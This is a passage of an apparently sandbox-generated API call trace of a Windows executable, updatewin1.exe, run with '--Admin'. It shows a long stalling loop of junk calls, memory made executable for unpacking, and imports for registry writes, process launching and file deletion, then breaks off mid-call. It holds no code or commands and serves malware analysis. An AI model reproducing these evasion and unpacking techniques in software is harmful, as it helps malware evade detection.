0x51 [0130.997] AddAtomA (lpString=0x0) returned 0x0 [0130.997] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.997] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.997] AddAtomA (lpString=0x0) returned 0x0 [0130.997] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.997] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.997] AddAtomA (lpString=0x0) returned 0x0 [0130.997] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.997] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.997] AddAtomA (lpString=0x0) returned 0x0 [0130.997] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.997] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.997] AddAtomA (lpString=0x0) returned 0x0 [0130.997] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.997] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.997] AddAtomA (lpString=0x0) returned 0x0 [0130.997] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.997] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.997] AddAtomA (lpString=0x0) returned 0x0 [0130.997] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.998] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.998] AddAtomA (lpString=0x0) returned 0x0 [0130.998] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.998] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.998] AddAtomA (lpString=0x0) returned 0x0 [0130.998] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.998] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.998] AddAtomA (lpString=0x0) returned 0x0 [0130.998] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.998] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.998] AddAtomA (lpString=0x0) returned 0x0 [0130.998] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.998] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.998] AddAtomA (lpString=0x0) returned 0x0 [0130.998] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.998] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.998] AddAtomA (lpString=0x0) returned 0x0 [0130.998] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.998] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.998] AddAtomA (lpString=0x0) returned 0x0 [0130.998] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.998] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.998] AddAtomA (lpString=0x0) returned 0x0 [0130.998] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.999] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.999] AddAtomA (lpString=0x0) returned 0x0 [0130.999] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.999] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.999] AddAtomA (lpString=0x0) returned 0x0 [0130.999] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.999] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.999] AddAtomA (lpString=0x0) returned 0x0 [0130.999] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.999] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.999] AddAtomA (lpString=0x0) returned 0x0 [0130.999] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.999] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.999] AddAtomA (lpString=0x0) returned 0x0 [0130.999] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.999] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.999] AddAtomA (lpString=0x0) returned 0x0 [0130.999] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.999] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.999] AddAtomA (lpString=0x0) returned 0x0 [0130.999] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.999] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.999] AddAtomA (lpString=0x0) returned 0x0 [0130.999] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.999] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0131.000] AddAtomA (lpString=0x0) returned 0x0 [0131.000] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0131.000] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0131.000] AddAtomA (lpString=0x0) returned 0x0 [0131.000] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0131.000] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0131.000] AddAtomA (lpString=0x0) returned 0x0 [0131.000] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0131.000] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0131.000] AddAtomA (lpString=0x0) returned 0x0 [0131.000] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0131.000] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0131.000] AddAtomA (lpString=0x0) returned 0x0 [0131.000] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0131.000] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0131.000] AddAtomA (lpString=0x0) returned 0x0 [0131.000] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0131.000] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0131.000] AddAtomA (lpString=0x0) returned 0x0 [0131.000] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0131.000] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0131.000] AddAtomA (lpString=0x0) returned 0x0 [0131.000] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0131.000] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0131.000] AddAtomA (lpString=0x0) returned 0x0 [0131.001] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0131.001] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0131.001] AddAtomA (lpString=0x0) returned 0x0 [0131.001] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0131.001] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0131.001] AddAtomA (lpString=0x0) returned 0x0 [0131.001] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0131.001] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0131.001] AddAtomA (lpString=0x0) returned 0x0 [0131.001] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0131.001] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0131.001] AddAtomA (lpString=0x0) returned 0x0 [0131.001] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0131.001] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0131.001] AddAtomA (lpString=0x0) returned 0x0 [0131.001] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0131.001] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0131.001] AddAtomA (lpString=0x0) returned 0x0 [0131.001] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0131.001] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0131.001] AddAtomA (lpString=0x0) returned 0x0 [0131.001] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0131.001] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0131.001] AddAtomA (lpString=0x0) returned 0x0 [0131.001] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0131.002] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0131.002] AddAtomA (lpString=0x0) returned 0x0 [0131.002] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0131.002] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0131.002] AddAtomA (lpString=0x0) returned 0x0 [0131.002] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0131.002] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0131.002] AddAtomA (lpString=0x0) returned 0x0 [0131.002] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0131.002] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0131.002] AddAtomA (lpString=0x0) returned 0x0 [0131.002] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0131.002] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0131.002] AddAtomA (lpString=0x0) returned 0x0 [0131.002] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0131.002] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0131.029] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76d30000 [0131.029] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualAlloc") returned 0x76d41856 [0131.029] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualProtect") returned 0x76d4435f [0131.029] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualFree") returned 0x76d4186e [0131.029] GetProcAddress (hModule=0x76d30000, lpProcName="GetVersionExA") returned 0x76d43519 [0131.029] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateProcess") returned 0x76d5d802 [0131.029] GetProcAddress (hModule=0x76d30000, lpProcName="ExitProcess") returned 0x76d47a10 [0131.029] GetProcAddress (hModule=0x76d30000, lpProcName="SetErrorMode") returned 0x76d41b00 [0131.029] SetErrorMode (uMode=0x400) returned 0x0 [0131.029] SetErrorMode (uMode=0x0) returned 0x400 [0131.030] GetVersionExA (in: lpVersionInformation=0x18e550*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x65006564, dwMinorVersion=0x7373, dwBuildNumber=0x2, dwPlatformId=0xffffffff, szCSDVersion="s}Çw") | out: lpVersionInformation=0x18e550*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0131.030] VirtualAlloc (lpAddress=0x0, dwSize=0x2d200, flAllocationType=0x1000, flProtect=0x4) returned 0x210000 [0131.032] VirtualProtect (in: lpAddress=0x400000, dwSize=0x32000, flNewProtect=0x40, lpflOldProtect=0x18f5d8 | out: lpflOldProtect=0x18f5d8*=0x2) returned 1 [0131.073] VirtualFree (lpAddress=0x210000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.076] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x76d30000 [0131.076] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileA") returned 0x76d453c6 [0131.076] GetProcAddress (hModule=0x76d30000, lpProcName="WriteFile") returned 0x76d41282 [0131.076] GetProcAddress (hModule=0x76d30000, lpProcName="FlushFileBuffers") returned 0x76d4469b [0131.076] GetProcAddress (hModule=0x76d30000, lpProcName="CloseHandle") returned 0x76d41410 [0131.076] GetProcAddress (hModule=0x76d30000, lpProcName="CreateProcessA") returned 0x76d41072 [0131.076] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcpyW") returned 0x76d63102 [0131.076] GetProcAddress (hModule=0x76d30000, lpProcName="CreateProcessW") returned 0x76d4103d [0131.076] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForSingleObject") returned 0x76d41136 [0131.077] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileW") returned 0x76d43f5c [0131.077] GetProcAddress (hModule=0x76d30000, lpProcName="lstrlenA") returned 0x76d45a4b [0131.077] GetProcAddress (hModule=0x76d30000, lpProcName="WideCharToMultiByte") returned 0x76d4170d [0131.077] GetProcAddress (hModule=0x76d30000, lpProcName="MultiByteToWideChar") returned 0x76d4192e [0131.077] GetProcAddress (hModule=0x76d30000, lpProcName="GetCommandLineW") returned 0x76d45223 [0131.077] GetProcAddress (hModule=0x76d30000, lpProcName="WriteConsoleW") returned 0x76d67aca [0131.077] GetProcAddress (hModule=0x76d30000, lpProcName="SetFilePointerEx") returned 0x76d5c807 [0131.077] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleMode") returned 0x76d41328 [0131.077] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteFileA") returned 0x76d45444 [0131.077] GetProcAddress (hModule=0x76d30000, lpProcName="HeapReAlloc") returned 0x77c81f6e [0131.078] GetProcAddress (hModule=0x76d30000, lpProcName="HeapSize") returned 0x77c73002 [0131.078] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcessHeap") returned 0x76d414e9 [0131.078] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringW") returned 0x76d417b9 [0131.078] GetProcAddress (hModule=0x76d30000, lpProcName="GetStringTypeW") returned 0x76d41946 [0131.078] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileType") returned 0x76d43531 [0131.078] GetProcAddress (hModule=0x76d30000, lpProcName="SetStdHandle") returned 0x76dc454f [0131.078] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcatA") returned 0x76d62b7a [0131.078] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcpyA") returned 0x76d62a9d [0131.078] GetProcAddress (hModule=0x76d30000, lpProcName="GetEnvironmentVariableA") returned 0x76d433a0 [0131.078] GetProcAddress (hModule=0x76d30000, lpProcName="GetShortPathNameA") returned 0x76d6594d [0131.079] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleFileNameA") returned 0x76d414b1 [0131.079] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleCP") returned 0x76de7bff [0131.079] GetProcAddress (hModule=0x76d30000, lpProcName="SetLastError") returned 0x76d411a9 [0131.079] GetProcAddress (hModule=0x76d30000, lpProcName="FreeEnvironmentStringsW") returned 0x76d451cb [0131.079] GetProcAddress (hModule=0x76d30000, lpProcName="GetEnvironmentStringsW") returned 0x76d451e3 [0131.079] GetProcAddress (hModule=0x76d30000, lpProcName="GetCommandLineA") returned 0x76d451a1 [0131.079] GetProcAddress (hModule=0x76d30000, lpProcName="GetCPInfo") returned 0x76d45189 [0131.079] GetProcAddress (hModule=0x76d30000, lpProcName="GetOEMCP") returned 0x76d6d1a1 [0131.079] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidCodePage") returned 0x76d44493 [0131.079] GetProcAddress (hModule=0x76d30000, lpProcName="UnhandledExceptionFilter") returned 0x76d6772f [0131.079] GetProcAddress (hModule=0x76d30000, lpProcName="SetUnhandledExceptionFilter") returned 0x76d487c9 [0131.080] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcess") returned 0x76d41809 [0131.080] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateProcess") returned 0x76d5d802 [0131.080] GetProcAddress (hModule=0x76d30000, lpProcName="IsProcessorFeaturePresent") returned 0x76d45235 [0131.080] GetProcAddress (hModule=0x76d30000, lpProcName="QueryPerformanceCounter") returned 0x76d41725 [0131.080] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessId") returned 0x76d411f8 [0131.080] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentThreadId") returned 0x76d41450 [0131.080] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemTimeAsFileTime") returned 0x76d43509 [0131.080] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeSListHead") returned 0x77c794a4 [0131.080] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0131.080] GetProcAddress (hModule=0x76d30000, lpProcName="GetStartupInfoW") returned 0x76d44d40 [0131.081] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleW") returned 0x76d434b0 [0131.081] GetProcAddress (hModule=0x76d30000, lpProcName="RtlUnwind") returned 0x76d6d1c3 [0131.081] GetProcAddress (hModule=0x76d30000, lpProcName="RaiseException") returned 0x76d458a6 [0131.081] GetProcAddress (hModule=0x76d30000, lpProcName="GetLastError") returned 0x76d411c0 [0131.081] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0131.081] GetProcAddress (hModule=0x76d30000, lpProcName="EnterCriticalSection") returned 0x77c622b0 [0131.081] GetProcAddress (hModule=0x76d30000, lpProcName="LeaveCriticalSection") returned 0x77c62270 [0131.081] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteCriticalSection") returned 0x77c745f5 [0131.081] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x76d41916 [0131.081] GetProcAddress (hModule=0x76d30000, lpProcName="TlsAlloc") returned 0x76d449ad [0131.081] GetProcAddress (hModule=0x76d30000, lpProcName="TlsGetValue") returned 0x76d411e0 [0131.082] GetProcAddress (hModule=0x76d30000, lpProcName="TlsSetValue") returned 0x76d414fb [0131.082] GetProcAddress (hModule=0x76d30000, lpProcName="TlsFree") returned 0x76d43587 [0131.082] GetProcAddress (hModule=0x76d30000, lpProcName="FreeLibrary") returned 0x76d434c8 [0131.082] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcAddress") returned 0x76d41222 [0131.082] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryExW") returned 0x76d4495d [0131.082] GetProcAddress (hModule=0x76d30000, lpProcName="GetStdHandle") returned 0x76d451b3 [0131.082] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleFileNameW") returned 0x76d44950 [0131.082] GetProcAddress (hModule=0x76d30000, lpProcName="ExitProcess") returned 0x76d47a10 [0131.082] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleExW") returned 0x76d44a6f [0131.082] GetProcAddress (hModule=0x76d30000, lpProcName="GetACP") returned 0x76d4179c [0131.083] GetProcAddress (hModule=0x76d30000, lpProcName="HeapAlloc") returned 0x77c6e026 [0131.083] GetProcAddress (hModule=0x76d30000, lpProcName="HeapFree") returned 0x76d414c9 [0131.083] GetProcAddress (hModule=0x76d30000, lpProcName="FindClose") returned 0x76d44442 [0131.083] GetProcAddress (hModule=0x76d30000, lpProcName="FindFirstFileExW") returned 0x76d51811 [0131.083] GetProcAddress (hModule=0x76d30000, lpProcName="FindNextFileW") returned 0x76d454ee [0131.083] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0131.083] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77710000 [0131.083] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyExW") returned 0x7772468d [0131.083] GetProcAddress (hModule=0x77710000, lpProcName="RegCloseKey") returned 0x7772469d [0131.084] GetProcAddress (hModule=0x77710000, lpProcName="RegCreateKeyExW") returned 0x777240fe [0131.084] GetProcAddress (hModule=0x77710000, lpProcName="SetSecurityDescriptorDacl") returned 0x7772415e [0131.084] GetProcAddress (hModule=0x77710000, lpProcName="InitializeSecurityDescriptor") returned 0x77724620 [0131.084] GetProcAddress (hModule=0x77710000, lpProcName="RegSetValueExW") returned 0x777214d6 [0131.084] LoadLibraryA (lpLibFileName="SHELL32.dll") returned 0x759d0000 [0131.084] GetProcAddress (hModule=0x759d0000, lpProcName="ShellExecuteExW") returned 0x759f1e46 [0131.084] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0131.084] GetProcAddress (hModule=0x759d0000, lpProcName="CommandLineToArgvW") returned 0x759e9ee8 [0131.084] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x772f0000 [0131.084] GetProcAddress (hModule=0x772f0000, lpProcName="PathAppendW") returned 0x773081ef [0131.085] GetProcAddress (hModule=0x772f0000, lpProcName="PathFileExistsA") returned 0x7732ad1a [0131.085] GetProcAddress (hModule=0x772f0000, lpProcName="PathRemoveFileSpecW") returned 0x77303248 [0131.085] LoadLibraryA (lpLibFileName="msvcr100.dll") returned 0x754d0000 [0131.089] GetProcAddress (hModule=0x754d0000, lpProcName="atexit") returned 0x754ec544 [0131.089] atexit (param_1=0x5e63e0) returned 0 [0131.089] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18f5dc | out: lpSystemTimeAsFileTime=0x18f5dc*(dwLowDateTime=0x58767eb0, dwHighDateTime=0x1d6bf06)) [0131.089] GetCurrentThreadId () returned 0x844 [0131.089] GetCurrentProcessId () returned 0x748 [0131.089] QueryPerformanceCounter (in: lpPerformanceCount=0x18f5d4 | out: lpPerformanceCount=0x18f5d4*=25135425758) returned 1 [0131.090] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0131.090] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x0 [0131.090] GetLastError () returned 0x57 [0131.090] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x0 [0131.090] GetLastError () returned 0x57 [0131.090] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x0) returned 0x76d30000 [0131.090] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionEx") returned 0x76d44d28 [0131.090] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0131.090] GetLastError () returned 0x57 [0131.090] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0131.090] GetProcAddress (hModule=0x76d30000, lpProcName="FlsSetValue") returned 0x76d44208 [0131.090] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x0 [0131.090] GetLastError () returned 0x57 [0131.090] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x0 [0131.091] GetLastError () returned 0x57 [0131.091] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x0) returned 0x76d30000 [0131.091] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionEx") returned 0x76d44d28 [0131.091] GetProcessHeap () returned 0x5d0000 [0131.091] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0131.091] GetLastError () returned 0x57 [0131.091] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0131.091] GetLastError () returned 0x57 [0131.091] GetProcAddress (hModule=0x76d30000, lpProcName="FlsGetValue") returned 0x76d41252 [0131.092] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x364) returned 0x5fa9f0 [0131.092] SetLastError (dwErrCode=0x57) [0131.092] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0xc00) returned 0x5fad60 [0131.094] GetStartupInfoW (in: lpStartupInfo=0x18f510 | out: lpStartupInfo=0x18f510*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\68fff198-b032-4cc5-9a68-f439953f0783\\updatewin1.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x5, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x4033b0, hStdOutput=0x83c9434d, hStdError=0xfffffffe)) [0131.094] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0131.094] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0131.094] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0131.094] GetCommandLineA () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\68fff198-b032-4cc5-9a68-f439953f0783\\updatewin1.exe\" --Admin" [0131.094] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\68fff198-b032-4cc5-9a68-f439953f0783\\updatewin1.exe\" --Admin" [0131.094] IsValidCodePage (CodePage=0x4e4) returned 1 [0131.094] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f530 | out: lpCPInfo=0x18f530) returned 1 [0131.094] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18edf8 | out: lpCPInfo=0x18edf8) returned 1 [0131.094] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f40c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0131.094] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f40c, cbMultiByte=256, lpWideCharStr=0x18eb98, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0131.094] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18ee0c | out: lpCharType=0x18ee0c) returned 1 [0131.094] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f40c, cbMultiByte=256, lpWideCharStr=0x0, 